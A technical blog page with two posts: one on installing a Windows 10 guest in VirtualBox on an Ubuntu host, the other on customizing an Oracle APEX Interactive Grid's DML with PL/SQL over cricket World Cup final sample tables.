    Yes, you read that right. There are lots of guides out there on how to set up and run Ubuntu in VirtualBox on a Windows host.
    These days, you even have access to an Ubuntu sub-system in Windows itself.
    If, like me, your OS of choice is Ubuntu but you need to test how something behaves in Windows – is it possible to knock up an appropriate environment ?
    The answer is, of course, yes – otherwise this would be quite a short post.

    The following steps will work for VirtualBox on any host – Linux, Mac, even Windows.

    What I’m going to cover is :

    • Finding a Windows ISO
    • Configuring the VM in VirtualBox
    • Persuading VirtualBox to use a sensible screen size for your new VM

    But first…

    A quick word about versions

    The Host OS I’m running is Ubuntu 16.04 LTS.
    I’m using version 5.0 of VirtualBox.
    NOTE – steps to install VirtualBox on a Debian-based host such as Ubuntu can be found here.
    The Guest OS I’m installing is, as you’d expect, Windows 10.

    Finding a Windows ISO

    Depending on which Windows edition you are after, there are a couple of places you can look.
    Microsoft provides an ISO for a 180-day evaluation version of Windows Server here.

    In this case, I simply want to try Windows 10 so I need to go to this page.

    Once here, I need to select an edition…

    …and the language…

    …before we’re presented with a choice of 32 or 64-bit :

    I’ve chosen 64-bit. After the download, I am now the proud owner of :

    -rw-rw-r-- 1 mike mike 4.7G Jul 10 17:10 Win10_1903_V1_English_x64.iso
    
    Creating the VirtualBox VM

    Fire up VirtualBox and click on the New button to start the Create Virtual Machine wizard :

    …Next assign it some memory


    I’m going to create a Virtual Hard Disk :

    …using the default type…

    …and being dynamically allocated…

    …of the size recommended by VirtualBox :

    I now have a new VM, which I need to point at the Windows ISO I downloaded so that I can install Windows itself :

    All I have to do now is follow the Windows installation prompts, a process which I’ll not bore you with here.
    However, you may be interested to learn that you don’t necessarily require a Product Key for this installation.
    Chris Hoffman has produced an excellent guide on the subject.

    Installing Guest Additions

    Now I’ve configured Windows, I still need to install VirtualBox Guest Additions. Among other things, this will help to control the screen size of the VM so that I don’t need a magnifying glass !

    First of all, we need to virtually eject the virtual cd containing the Windows ISO. To do this, we actually go to the VM’s VirtualBox menu and select Devices/Optical Drives/Remove disk from virtual drive :

    Now, using the same menu (Devices), we select Insert Guest Additions CD Image :

    When Windows prompts you, choose to install :

    Accept the defaults when prompted and then reboot the VM.

    If, by some chance you are still faced with a small viewport for your Windows VM, you can try the following…

    Resizing the VM display

    Go to the VirtualBox application itself and with the VM selected, go to the File/Preferences menu.

    Click on Display, and set the Maximum Guest Screen Size to Automatic

    When you next re-start the VM, the window should now be a more reasonable size.
    In fact, with any luck, your desktop should now look something like this :

    The best way to run Windows !

    Customizing DML in an APEX Interactive Grid

    Tue, 2019-07-23 16:06

    It should have been quite a relaxing Cricket World Cup final. After all, it was England v New Zealand. I was guaranteed to be on the winning side.
    After several hours of nerve-shredding tension had failed to separate the teams, England were awarded the trophy on the basis of dumb luck (hitting more boundaries). The result was borne with stoicism by the Black Caps, whose philosophy would, in other countries, be known as “Elite Niceness”. By a cruel twist of fate, Ben Stokes – England’s star all-rounder and Man of the Match – was actually born in Christchurch.
    Oracle APEX has its own star all-rounder in the shape of the Editable Interactive Grid ( see what I did there ?)
    As well as presenting information in the same way as an Interactive Report, it allows users to perform DML operations on the records it displays – provided it’s based on a single table.
    What we’re going to look at here is how to base an Interactive Grid (IG) on a Query rather than a table whilst retaining the ability to perform DML operations on the displayed records. To achieve this, we’ll be customizing the PL/SQL that is executed when a DML operation is invoked in the IG.

    The Application

    For what follows, I’ll be using APEX 18.2 running against an Oracle 18cXE database.

    We have two related tables which hold information about Men’s 50-over Cricket World Cup Finals :

    The tables were created as follows :

    create table teams(
        cid varchar2(3) primary key,
        team_name varchar2(100) not null)
    /
    
    create table finals(
        tournament_year number(4) primary key,
        date_played date,
        venue varchar2(100),
        winning_tcid varchar2(3) references teams(cid),
        losing_tcid varchar2(3) references teams(cid),
        winning_margin varchar2(100))
    /    
    

    … and have been populated with some data. The TEAMS table first…

    insert into teams( cid, team_name)
    values('AUS', 'AUSTRALIA');
    
    insert into teams( cid, team_name)
    values('ENG', 'ENGLAND');
    
    insert into teams( cid, team_name)
    values('RSA', 'SOUTH AFRICA');
    
    insert into teams( cid, team_name)
    values('WI', 'WEST INDIES');
    
    insert into teams( cid, team_name)
    values('IND', 'INDIA');
    
    insert into teams( cid, team_name)
    values('NZL', 'NEW ZEALAND');
    
    insert into teams( cid, team_name)
    values('PAK', 'PAKISTAN');
    
    insert into teams( cid, team_name)
    values('SL', 'SRI LANKA');
    
    insert into teams( cid, team_name)
    values('ZIM', 'ZIMBABWE');
    
    insert into teams( cid, team_name)
    values('BAN', 'BANGLADESH');
    
    insert into teams( cid, team_name)
    values('AFG', 'AFGHANISTAN');
    
    insert into teams( cid, team_name)
    values('IRL', 'IRELAND');
    
    commit;
    

    …and then FINALS…

    insert into finals(tournament_year, date_played, venue, winning_tcid, losing_tcid, winning_margin)
    values(1975, to_date('21-JUN-1975', 'DD-MON-YYYY'), 'LORDS', 'WI', 'AUS', '17 runs');
    
    insert into finals(tournament_year, date_played, venue, winning_tcid, losing_tcid, winning_margin)
    values(1979, to_date('23-JUN-1979' , 'DD-MON-YYYY'), 'LORDS', 'WI', 'ENG', '92 runs');
    
    insert into finals(tournament_year, date_played, venue, winning_tcid, losing_tcid, winning_margin)
    values(1983, to_date('25-JUN-1983' , 'DD-MON-YYYY'), 'LORDS', 'IND', 'WI', '43 runs');
    
    insert into finals(tournament_year, date_played, venue, winning_tcid, losing_tcid, winning_margin)
    values(1987, to_date('08-NOV-1987' , 'DD-MON-YYYY'), 'EDEN GARDENS', 'AUS', 'ENG', '7 runs');
    
    insert into finals(tournament_year, date_played, venue, winning_tcid, losing_tcid, winning_margin)
    values(1992, to_date('25-MAR-1992' , 'DD-MON-YYYY'), null, 'PAK', 'ENG', '22 runs');
    
    -- deliberate mistake to be corrected later
    insert into finals(tournament_year, date_played, venue, winning_tcid, losing_tcid, winning_margin)
    values(1997, to_date('17-MAR-1996' , 'DD-MON-YYYY'), 'QADDAFI STADIUM', 'SL', 'AUS', '8 wickets');
    
    commit;
    
    

    The data that we wish to present to application users can be retrieved with the following query :

    select f.tournament_year, f.date_played, 
        initcap(f.venue) as venue,
        initcap(win.team_name) as winners,
        initcap(ru.team_name) as runners_up,
        f.winning_margin
    from finals f
    inner join teams win on f.winning_tcid = win.cid
    inner join teams ru on f.losing_tcid = ru.cid
    /
    

    There are a couple of issues with the data as it stands so we want users to be able to edit the existing application records and add new ones.
    As we’re using APEX, it would be good if we could use an Editable Interactive Grid as this would mean only needing to write a single page to handle all of these actions.
    Of course, we could simply create a view using this query and then knock up an Instead Of trigger to handle any DML.
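
    Just to illustrate the point, a minimal sketch of that view-plus-trigger approach ( handling deletes only, for brevity – it’s not the route we’re taking here) might look something like this :

    create or replace view finals_vw as
        select f.tournament_year, f.date_played, 
            initcap(f.venue) as venue,
            initcap(win.team_name) as winners,
            initcap(ru.team_name) as runners_up,
            f.winning_margin
        from finals f
        inner join teams win on f.winning_tcid = win.cid
        inner join teams ru on f.losing_tcid = ru.cid
    /
    
    create or replace trigger finals_vw_iod
        instead of delete on finals_vw
        for each row
    begin
        delete from finals
        where tournament_year = :old.tournament_year;
    end;
    /
    

    Alternatively…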

    Creating the Interactive Grid

    The first step is to create a Region…

    …and define it as an IG…

    …using the above query as the Source SQL Query

    When we run this (after saving our changes), we can see that the ROW_SELECTOR and ROW_ACTION widgets are missing :

    Making the IG Editable

    In order to persuade APEX to add these widgets, we need to make the IG Editable. We can do this by going to the Region’s Attributes and setting the Edit Enabled property to Yes

    Among other things, this automatically creates a Save Interactive Grid Data process :

    However, if we attempt to run the page now (after saving these changes), we’ll hit an error…

    …so we need to select a Primary Key.
    TOURNAMENT_YEAR will fulfil this purpose in our IG, so we just need to adjust the properties of the column :

    When we save the change and run the page we can see that the ROW_SELECTOR and ROW_ACTION are now present :

    The IG is not based on a table or view, remember, so we still need to tell APEX what to do when any DML actions are initiated by the user.

    Customising the Save Interactive Grid Data process

    Returning to the Processing Tab in the Page Designer we need to change the Type of this process to PL/SQL Code :

    In the Source PL/SQL Code box, we need to enter a PL/SQL block which will be run whenever the Page processes a DML action.
    In order to tell what specific DML action a row is subject to, we can look at the value of the built-in APEX$ROW_STATUS variable.
    The possible values are :

    • C – Create
    • U – Update
    • D – Delete

    Therefore, one approach for our PL/SQL block would be simply to include the actual DML statements we want to execute in-line like this :

    declare 
        l_win_tcid finals.winning_tcid%type;
        l_ru_tcid finals.losing_tcid%type;
        
        cursor c_team_cid( i_name teams.team_name%type)
        is
            select cid
            from teams
            where team_name = upper(i_name);
    begin
        -- reset the variables for each pass through this process
        l_win_tcid := null;
        l_ru_tcid := null;
        
        if :APEX$ROW_STATUS = 'D' then
            -- DELETE the record
            delete from finals
            where tournament_year = :TOURNAMENT_YEAR;
            
        else
    
            -- As we're either doing an UPDATE or an INSERT, we need to find the 
            -- CID value for each of the team names ( if specified)
    
            if :WINNERS is not null then
                open c_team_cid(:WINNERS);
                fetch c_team_cid into l_win_tcid;
                close c_team_cid;
            end if;
    
            if :RUNNERS_UP is not null then
                open c_team_cid(:RUNNERS_UP);
                fetch c_team_cid into l_ru_tcid;
                close c_team_cid;
            end if;
            
            if :APEX$ROW_STATUS = 'U' then
                -- UPDATE the record
                -- Note that, although DATE_PLAYED is a DATE field, the bind variable
                -- contains a string so we need to handle the conversion to a date here
                update finals
                set date_played = nvl(to_date(:DATE_PLAYED, sys_context('userenv', 'nls_date_format')), date_played),
                    venue = nvl(:VENUE, venue),
                    winning_tcid = nvl(l_win_tcid, winning_tcid),
                    losing_tcid = nvl(l_ru_tcid, losing_tcid),
                    winning_margin = nvl(:WINNING_MARGIN, winning_margin)
                where tournament_year = :TOURNAMENT_YEAR;
            
            elsif :APEX$ROW_STATUS = 'C' then
                -- CREATE (INSERT) as new record
                -- We need to return the Primary Key of the new record as APEX will
                -- use it to refresh the IG display and show the newly created row
                insert into finals( tournament_year, date_played, venue, 
                    winning_tcid, losing_tcid, winning_margin)
                values( :TOURNAMENT_YEAR, to_date(:DATE_PLAYED, sys_context('userenv', 'nls_date_format')), :VENUE,
                    l_win_tcid, l_ru_tcid, :WINNING_MARGIN)
                returning tournament_year into :TOURNAMENT_YEAR;
            end if;
        end if;
    end;
    

    The main points to note are :

    • The possible values of APEX$ROW_STATUS
    • the bind variables for the IG column values contain strings, hence the explicit date conversion of :DATE_PLAYED
    • when the insert code generates a new primary key value (e.g. an ID taken from a sequence), APEX needs to know what it is so that it can display the new record once processing is completed.

    On that last point, I believe that we may not need to return the PK value in this case because we’re already providing it explicitly in the UI. I’ve left it here as an illustration that this may be the case in other circumstances.
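
    For example ( a purely hypothetical sketch – the real FINALS table has no surrogate key, and FINALS_SEQ, RECORD_ID and :RECORD_ID don’t exist in this application), if the table were keyed on a sequence-populated RECORD_ID column, the CREATE branch would need to look more like this so that APEX gets the new key back :

    -- hypothetical : FINALS keyed on a sequence-populated RECORD_ID
    insert into finals( record_id, tournament_year, date_played, venue,
        winning_tcid, losing_tcid, winning_margin)
    values( finals_seq.nextval, :TOURNAMENT_YEAR,
        to_date(:DATE_PLAYED, sys_context('userenv', 'nls_date_format')), :VENUE,
        l_win_tcid, l_ru_tcid, :WINNING_MARGIN)
    returning record_id into :RECORD_ID;
    

    …where :RECORD_ID would be the bind variable for the IG’s Primary Key column.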

    Anyhow, let’s give this a test.
    First of all, we’re going to update the 1992 record with the venue :

    The record for 1997 is wrong. The Tournament actually took place in 1996, so we’ll create a corrected record and delete the incorrect one :

    In both cases, we get a success message :

    …and if we check in the database, we can see that the DML has worked as expected :

    NOTE : for any cricketing pedants reading – yes, I know that Sri Lanka won by 7 wickets, not 8. I’ll be correcting this when I “notice it” in a few paragraphs time.

    At this point you may be less than thrilled at the prospect of having to maintain large chunks of PL/SQL in your APEX application.
    Luckily for you, as the process code is a PL/SQL block, you can do pretty much anything you like…

    Calling Stored Program Units from our APEX process

    I’ve created a database package to handle DML operations on the FINALS table :

    create or replace package edit_finals as
    
        procedure save_final( 
            i_year in finals.tournament_year%type, 
            i_date in finals.date_played%type,
            i_venue in finals.venue%type default null,
            i_winners in teams.team_name%type default null,
            i_losers in teams.team_name%type default null,
            i_margin in finals.winning_margin%type default null,
            o_year out finals.tournament_year%type);
    
        procedure delete_final( i_year in finals.tournament_year%type);
    end edit_finals;
    /
    
    create or replace package body edit_finals as
    
        function get_team_cid( i_team in teams.team_name%type)
            return teams.cid%type 
        is 
            rtn_cid teams.cid%type;
        begin
            select cid 
            into rtn_cid
            from teams 
            where team_name = upper( i_team);
    
            return rtn_cid;
        end get_team_cid;
    
        procedure save_final( 
            i_year in finals.tournament_year%type, 
            i_date in finals.date_played%type,
            i_venue in finals.venue%type default null,
            i_winners in teams.team_name%type default null,
            i_losers in teams.team_name%type default null,
            i_margin in finals.winning_margin%type default null,
            o_year out finals.tournament_year%type)
        is 
            win_tcid teams.cid%type := null;
            ru_tcid teams.cid%type := null;
        begin
            if i_winners is not null then 
                win_tcid := get_team_cid( i_winners);
            end if;
    
            if i_losers is not null then 
                ru_tcid := get_team_cid( i_losers);
            end if;
    
            merge into finals 
                using dual 
                on ( tournament_year = i_year)
            when matched then update
                set date_played = nvl(i_date, date_played),
                    venue = nvl(i_venue, venue),
                    winning_tcid = nvl(win_tcid, winning_tcid),
                    losing_tcid = nvl(ru_tcid, losing_tcid),
                    winning_margin = nvl(i_margin, winning_margin)
                where tournament_year = i_year
            when not matched then 
                insert( tournament_year, date_played, venue, winning_tcid, losing_tcid, winning_margin)
                values( i_year, i_date, i_venue, win_tcid, ru_tcid, i_margin);
    
            o_year := i_year;
        end save_final;
    
        procedure delete_final( i_year in finals.tournament_year%type) is 
        begin
            delete from finals
            where tournament_year = i_year;
        end delete_final;
    end edit_finals;
    /
    

    This means that the PL/SQL code for the Save IG Process is a bit more compact :

    begin
        if :APEX$ROW_STATUS = 'D' then
            edit_finals.delete_final(i_year => :TOURNAMENT_YEAR);
        elsif :APEX$ROW_STATUS in ('C', 'U') then
            edit_finals.save_final( 
               i_year => :TOURNAMENT_YEAR, 
               i_date => to_date(:DATE_PLAYED, sys_context('userenv', 'nls_date_format')),
               i_venue => :VENUE,
               i_winners => :WINNERS,
               i_losers => :RUNNERS_UP,
               i_margin => :WINNING_MARGIN,
               o_year => :TOURNAMENT_YEAR);
       end if;
    end;
    

    The behaviour is the same…

    …which we can confirm in the database…

    The benefit of this approach is that, if you decide to migrate from APEX to another front-end technology, the Package is there in the database and does not need to change.

    References

    I’ve not managed to find too much else out there on this topic, hence this post.
    There is a very good forum post by Patrick Wolf.
    This Oracle Tips and Tricks article may be worth a read.
    Finally, there’s this rather comprehensive look at Interactive Grids by John Snyders.
